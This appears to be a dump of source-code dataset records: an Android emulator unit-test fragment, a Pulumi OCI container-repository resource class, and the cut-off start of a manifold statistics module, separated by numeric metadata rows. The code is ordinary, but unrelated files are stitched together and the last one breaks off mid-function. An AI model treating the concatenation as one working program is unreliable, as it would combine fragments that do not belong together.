self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
# Mock _FetchBuildIdFromFile method
self.Patch(
create_goldfish_action,
"_FetchBuildIdFromFile",
return_value=self.EMULATOR_BUILD_ID)
none_avd_spec = None
# Call CreateDevices
report = create_goldfish_action.CreateDevices(
none_avd_spec, cfg, build_target=self.BUILD_TARGET,
build_id=self.BUILD_ID, emulator_build_id=None,
gpu=self.GPU)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
if __name__ == "__main__":
unittest.main()
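The tests above drive self.build_client.GetBuildInfo with side_effect lists so that consecutive calls return the system, emulator and kernel build info in that order. A stand-alone illustration of that unittest.mock behaviour, with plain tuples in place of BuildInfo objects, is:
# Stand-alone illustration of the side_effect sequencing used above; BuildInfo
# is replaced by a simple tuple to keep the example self-contained.
from unittest import mock

build_client = mock.MagicMock()
build_client.GetBuildInfo.side_effect = [
    ("fake-branch", "12345", "fake-build-target"),
    ("emu-fake-branch", "1234567", "emu-fake-target"),
    ("fake-kernel-branch", "54321", "kernel"),
]

# Each call consumes the next entry, matching the system/emulator/kernel order
# in which the CreateDevices flow queries them.
assert build_client.GetBuildInfo("target", "id")[1] == "12345"
assert build_client.GetBuildInfo("target", "id")[1] == "1234567"
assert build_client.GetBuildInfo("target", "id")[1] == "54321"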
| 41.449664
| 81
| 0.643405
| 2,117
| 18,528
| 5.290978
| 0.101559
| 0.059995
| 0.053031
| 0.032229
| 0.808231
| 0.775556
| 0.768592
| 0.736184
| 0.725471
| 0.722525
| 0
| 0.004043
| 0.279145
| 18,528
| 446
| 82
| 41.542601
| 0.834606
| 0.091159
| 0
| 0.754237
| 0
| 0
| 0.054183
| 0.01092
| 0
| 0
| 0
| 0.002242
| 0.042373
| 1
| 0.014124
| false
| 0
| 0.031073
| 0
| 0.101695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e8998e08fb03a77ca3cba64ad0f4cfe22e99a37
| 27,175
|
py
|
Python
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/artifacts/container_repository.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ContainerRepositoryArgs', 'ContainerRepository']
@pulumi.input_type
class ContainerRepositoryArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
display_name: pulumi.Input[str],
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']] = None):
"""
The set of arguments for constructing a ContainerRepository resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input['ContainerRepositoryReadmeArgs'] readme: (Updatable) Container repository readme.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "display_name", display_name)
if is_immutable is not None:
pulumi.set(__self__, "is_immutable", is_immutable)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if readme is not None:
pulumi.set(__self__, "readme", readme)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@is_immutable.setter
def is_immutable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_immutable", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter
def readme(self) -> Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@readme.setter
def readme(self, value: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]):
pulumi.set(self, "readme", value)
@pulumi.input_type
class _ContainerRepositoryState:
def __init__(__self__, *,
billable_size_in_gbs: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
created_by: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
image_count: Optional[pulumi.Input[int]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
layer_count: Optional[pulumi.Input[int]] = None,
layers_size_in_bytes: Optional[pulumi.Input[str]] = None,
readme: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_pushed: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ContainerRepository resources.
:param pulumi.Input[str] billable_size_in_gbs: Total storage size in GBs that will be charged.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] created_by: The id of the user or principal that created the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[int] image_count: Total number of images.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[int] layer_count: Total number of layers.
:param pulumi.Input[str] layers_size_in_bytes: Total storage in bytes consumed by layers.
:param pulumi.Input['ContainerRepositoryReadmeArgs'] readme: (Updatable) Container repository readme.
:param pulumi.Input[str] state: The current state of the container repository.
:param pulumi.Input[str] time_created: An RFC 3339 timestamp indicating when the repository was created.
:param pulumi.Input[str] time_last_pushed: An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
if billable_size_in_gbs is not None:
pulumi.set(__self__, "billable_size_in_gbs", billable_size_in_gbs)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if created_by is not None:
pulumi.set(__self__, "created_by", created_by)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if image_count is not None:
pulumi.set(__self__, "image_count", image_count)
if is_immutable is not None:
pulumi.set(__self__, "is_immutable", is_immutable)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if layer_count is not None:
pulumi.set(__self__, "layer_count", layer_count)
if layers_size_in_bytes is not None:
pulumi.set(__self__, "layers_size_in_bytes", layers_size_in_bytes)
if readme is not None:
pulumi.set(__self__, "readme", readme)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_last_pushed is not None:
pulumi.set(__self__, "time_last_pushed", time_last_pushed)
@property
@pulumi.getter(name="billableSizeInGbs")
def billable_size_in_gbs(self) -> Optional[pulumi.Input[str]]:
"""
Total storage size in GBs that will be charged.
"""
return pulumi.get(self, "billable_size_in_gbs")
@billable_size_in_gbs.setter
def billable_size_in_gbs(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billable_size_in_gbs", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> Optional[pulumi.Input[str]]:
"""
The id of the user or principal that created the resource.
"""
return pulumi.get(self, "created_by")
@created_by.setter
def created_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_by", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="imageCount")
def image_count(self) -> Optional[pulumi.Input[int]]:
"""
Total number of images.
"""
return pulumi.get(self, "image_count")
@image_count.setter
def image_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "image_count", value)
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@is_immutable.setter
def is_immutable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_immutable", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="layerCount")
def layer_count(self) -> Optional[pulumi.Input[int]]:
"""
Total number of layers.
"""
return pulumi.get(self, "layer_count")
@layer_count.setter
def layer_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "layer_count", value)
@property
@pulumi.getter(name="layersSizeInBytes")
def layers_size_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
Total storage in bytes consumed by layers.
"""
return pulumi.get(self, "layers_size_in_bytes")
@layers_size_in_bytes.setter
def layers_size_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "layers_size_in_bytes", value)
@property
@pulumi.getter
def readme(self) -> Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@readme.setter
def readme(self, value: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]):
pulumi.set(self, "readme", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the container repository.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
An RFC 3339 timestamp indicating when the repository was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeLastPushed")
def time_last_pushed(self) -> Optional[pulumi.Input[str]]:
"""
An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
return pulumi.get(self, "time_last_pushed")
@time_last_pushed.setter
def time_last_pushed(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_last_pushed", value)
class ContainerRepository(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
__props__=None):
"""
This resource provides the Container Repository resource in Oracle Cloud Infrastructure Artifacts service.
Create a new empty container repository. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_container_repository = oci.artifacts.ContainerRepository("testContainerRepository",
compartment_id=var["compartment_id"],
display_name=var["container_repository_display_name"],
is_immutable=var["container_repository_is_immutable"],
is_public=var["container_repository_is_public"],
readme=oci.artifacts.ContainerRepositoryReadmeArgs(
content=var["container_repository_readme_content"],
format=var["container_repository_readme_format"],
))
```
## Import
ContainerRepositories can be imported using the `id`, e.g.
```sh
$ pulumi import oci:artifacts/containerRepository:ContainerRepository test_container_repository "container/repositories/{repositoryId}"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']] readme: (Updatable) Container repository readme.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerRepositoryArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Container Repository resource in Oracle Cloud Infrastructure Artifacts service.
Create a new empty container repository. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_container_repository = oci.artifacts.ContainerRepository("testContainerRepository",
compartment_id=var["compartment_id"],
display_name=var["container_repository_display_name"],
is_immutable=var["container_repository_is_immutable"],
is_public=var["container_repository_is_public"],
readme=oci.artifacts.ContainerRepositoryReadmeArgs(
content=var["container_repository_readme_content"],
format=var["container_repository_readme_format"],
))
```
## Import
ContainerRepositories can be imported using the `id`, e.g.
```sh
$ pulumi import oci:artifacts/containerRepository:ContainerRepository test_container_repository "container/repositories/{repositoryId}"
```
:param str resource_name: The name of the resource.
:param ContainerRepositoryArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerRepositoryArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerRepositoryArgs.__new__(ContainerRepositoryArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["is_immutable"] = is_immutable
__props__.__dict__["is_public"] = is_public
__props__.__dict__["readme"] = readme
__props__.__dict__["billable_size_in_gbs"] = None
__props__.__dict__["created_by"] = None
__props__.__dict__["image_count"] = None
__props__.__dict__["layer_count"] = None
__props__.__dict__["layers_size_in_bytes"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_last_pushed"] = None
super(ContainerRepository, __self__).__init__(
'oci:artifacts/containerRepository:ContainerRepository',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
billable_size_in_gbs: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
created_by: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
image_count: Optional[pulumi.Input[int]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
layer_count: Optional[pulumi.Input[int]] = None,
layers_size_in_bytes: Optional[pulumi.Input[str]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_pushed: Optional[pulumi.Input[str]] = None) -> 'ContainerRepository':
"""
Get an existing ContainerRepository resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] billable_size_in_gbs: Total storage size in GBs that will be charged.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] created_by: The id of the user or principal that created the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[int] image_count: Total number of images.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[int] layer_count: Total number of layers.
:param pulumi.Input[str] layers_size_in_bytes: Total storage in bytes consumed by layers.
:param pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']] readme: (Updatable) Container repository readme.
:param pulumi.Input[str] state: The current state of the container repository.
:param pulumi.Input[str] time_created: An RFC 3339 timestamp indicating when the repository was created.
:param pulumi.Input[str] time_last_pushed: An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ContainerRepositoryState.__new__(_ContainerRepositoryState)
__props__.__dict__["billable_size_in_gbs"] = billable_size_in_gbs
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["created_by"] = created_by
__props__.__dict__["display_name"] = display_name
__props__.__dict__["image_count"] = image_count
__props__.__dict__["is_immutable"] = is_immutable
__props__.__dict__["is_public"] = is_public
__props__.__dict__["layer_count"] = layer_count
__props__.__dict__["layers_size_in_bytes"] = layers_size_in_bytes
__props__.__dict__["readme"] = readme
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_last_pushed"] = time_last_pushed
return ContainerRepository(resource_name, opts=opts, __props__=__props__)
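# A hedged usage sketch (not part of the generated SDK): look up an existing repository's
# state by its provider id. The id below is a placeholder; substitute the repository id
# from your tenancy.
#
#   existing = ContainerRepository.get(
#       "existingContainerRepository",
#       id="<container repository id>")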
@property
@pulumi.getter(name="billableSizeInGbs")
def billable_size_in_gbs(self) -> pulumi.Output[str]:
"""
Total storage size in GBs that will be charged.
"""
return pulumi.get(self, "billable_size_in_gbs")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> pulumi.Output[str]:
"""
The id of the user or principal that created the resource.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="imageCount")
def image_count(self) -> pulumi.Output[int]:
"""
Total number of images.
"""
return pulumi.get(self, "image_count")
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> pulumi.Output[bool]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> pulumi.Output[bool]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@property
@pulumi.getter(name="layerCount")
def layer_count(self) -> pulumi.Output[int]:
"""
Total number of layers.
"""
return pulumi.get(self, "layer_count")
@property
@pulumi.getter(name="layersSizeInBytes")
def layers_size_in_bytes(self) -> pulumi.Output[str]:
"""
Total storage in bytes consumed by layers.
"""
return pulumi.get(self, "layers_size_in_bytes")
@property
@pulumi.getter
def readme(self) -> pulumi.Output['outputs.ContainerRepositoryReadme']:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the container repository.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
An RFC 3339 timestamp indicating when the repository was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeLastPushed")
def time_last_pushed(self) -> pulumi.Output[str]:
"""
An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
return pulumi.get(self, "time_last_pushed")
4ec4918af1234bf1c8c9ccca7e90ee1a84b3a8e0 | 179,336 | py | Python | StatsModel.py | sh4174/LonWGP | 24d1876cf6bedca64e63041d28e2a54d9475997f | ["MIT"]
# MRep Manifold
import manifolds
import numpy as np
import pylab
from random import shuffle
import itertools
# Stats Model
import statsmodels.api as sm
import matplotlib.pyplot as plt
#############################################################
########## Generalized Gaussian Noise Generation ##########
#############################################################
def GaussianNoisePerturbation( mu_0, sigma ):
if mu_0.Type == "Sphere":
return GaussianNoisePerturbation_Sphere( mu_0, sigma )
# elif dataList[ 0 ].Type == "PositiveReal":
# return GaussianNoisePerturbation_PosReal( mu_0, sigma )
# elif dataList[ 0 ].Type == "Euclidean":
# return GaussianNoisePerturbation_Euclidean( mu_0, sigma )
# elif dataList[ 0 ].Type == "CMRep":
# return GaussianNoisePerturbation_CMRep( mu_0, sigma )
# elif dataList[ 0 ].Type == "CMRep_Abstract":
# return GaussianNoisePerturbation_CMRep_Abstract( mu_0, sigma )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def GaussianNoisePerturbation_Sphere( mu_0, sigma ):
nDimManifold = mu_0.nDim
# Generate a random Gaussians with polar Box-Muller Method
rand_pt = np.zeros( nDimManifold ).tolist()
for i in range( nDimManifold ):
r2 = 0
x = 0
y = 0
while( r2 > 1.0 or r2 == 0 ):
x = ( 2.0 * np.random.rand() - 1.0 )
y = ( 2.0 * np.random.rand() - 1.0 )
r2 = x * x + y * y
gen_rand_no = sigma * y * np.sqrt( -2.0 * np.log( r2 ) / r2 )
rand_pt[ i ] = gen_rand_no
# print( rand_pt )
# Set Random Vector to Tangent Vector - ListToTangent
rand_tVec = manifolds.sphere_tVec( nDimManifold )
rand_tVec.SetTangentVector( rand_pt )
# Projected Tangent to Mean Point
rand_tVec_projected = mu_0.ProjectTangent( mu_0, rand_tVec )
# Perturbed point at time_pt
pt_perturbed = mu_0.ExponentialMap( rand_tVec_projected )
return pt_perturbed
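# Minimal usage sketch (not part of the original module): draw one noisy sample around a
# base point on the unit sphere with the tangent-space Box-Muller perturbation above. The
# north-pole base point and sigma value are illustrative assumptions.
def _example_gaussian_noise_sphere( sigma = 0.05 ):
    mu_0 = manifolds.sphere( 3 )
    mu_0.SetPoint( [ 0.0, 0.0, 1.0 ] )
    # Returns Exp_{mu_0}( v ) with v drawn from an isotropic Gaussian in the tangent space
    return GaussianNoisePerturbation( mu_0, sigma )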
######################################
########## Intrinsic Mean ##########
######################################
def FrechetMean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return FrechetMean_Sphere( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "PositiveReal":
return FrechetMean_PosReal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Euclidean":
return FrechetMean_Euclidean( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep":
return FrechetMean_CMRep( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_BNDRNormals":
return FrechetMean_CMRep_BNDRNormals( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract":
return FrechetMean_CMRep_Abstract( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract_Normal":
return FrechetMean_CMRep_Abstract_Normal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Kendall2D":
return FrechetMean_Kendall2D( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Scale_Kendall2D":
return FrechetMean_Scale_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def FrechetMean_Sphere( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.sphere_tVec( nManDim )
for j in range( nData ):
